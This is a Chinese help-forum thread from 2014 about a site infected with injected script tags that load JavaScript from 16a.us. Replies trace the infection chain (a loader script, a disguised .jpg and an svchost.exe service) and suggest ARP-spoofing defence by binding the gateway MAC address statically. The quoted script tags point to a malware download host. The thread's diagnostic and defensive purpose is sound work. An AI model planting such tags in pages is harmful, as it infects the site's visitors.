日期:2014-05-17  浏览次数:20800 次

这是什么病毒?如何解决?寻求帮助
我的小站的每个页面都被加入了下面的代码

<script   src=http://16a.us/8.js> </script>

如何解决啊?

------解决方案--------------------
防范是王道
------解决方案--------------------
病毒运行后在所访问的页面首行加上
<script src= "http://16a.us/2.js "> </script>
达到到指定页面下载病毒的目的。

所下载的是
NEW.JS和Vernum.js
2个js文件

New.js的内容主要是下载mytest2.jpg文件
mytest2.jpg并非是图片文件,通过将这个文件指定为网页的格式的方式达到运行病毒文件svchost.exe
的目的。

Vernum.js
将下载的svchost.exe注册成服务之类的,具体不清楚。

由此可见,整个流程是:
1、无疑中访问有病毒的网站。
2、下载2.js,运行2.js,下载运行2.js中指定的new.js和vernum.js
3、通过先下载伪装成mytest2.jpg的文件,将下载的病毒文件svchost.exe注册运行,等等,过程不祥.
4、svchost.exe运行后,会在访问的正常网页的首行加上 <2.js> ,完成病毒的不断自我保护。

还没完整解决,先注意svchost.exe文件吧。
先发上来,改天有空再慢慢研究下。
------解决方案--------------------
16a.us病毒(又一次ARP病毒欺骗攻击)解决方案,具体步骤请查看:
http://www.maihu.net/tech/view_227.html

基本原理是将网关的MAC地址进行静态绑定,我已经按照这个办法解决了我们单位局域网所有电脑上的这个问题。


麦糊网(maihu.net)-网站运营聚合门户